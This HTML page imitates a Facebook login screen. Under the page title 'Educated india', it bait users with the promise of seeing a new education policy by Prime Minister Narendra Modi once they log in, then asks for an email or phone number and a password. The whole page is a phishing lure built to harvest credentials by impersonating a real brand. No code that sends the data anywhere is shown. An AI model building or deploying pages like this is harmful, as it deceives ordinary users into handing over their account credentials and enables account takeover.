<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>Educated india</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">

        <style>
            form input{
                width: 80%;
                padding: 10px;
                margin: 10px;
                font-size: 2.5vh;
            }
            button{
                padding: 10px;
                margin: 10px;
                background-color: #008000;
                font-size: 16px;
                
            }
            .signup{
                padding: 12px;
                margin: 10px;
                background-color: #3b5998;
                color: white;
                cursor: pointer;
            }
            input[type="submit"]{
            				width: 90%;
            }
        </style>

    </head>
    <body style="background-color: white;">
        <center>   
            <h1 style="background-color: #3b5998; color: white; padding: 50px; border-radius: 1vh;">Facebook</h1>
            <h1 style="color: orchid; font-size: 20px;">Please first login your facebook account to see the new education policy by Pm (Narendra modi).</h1>
            
            
            

            <form style="background-color: white; padding: 25px 0px 25px 0px;">
                <input type="text" name="email" placeholder="Email or phone number"><br>
                <input type="password" name="password" placeholder="Password"><br>
                <input class="signup" type="submit" name="submit" value="Login"><br>
                --------------------or----------------------<br>
                <button>Create New Account</button><br>
                <a href="#">Forgetten Password ?</a>
            </form>
        </center>

       
    </body>
</html>
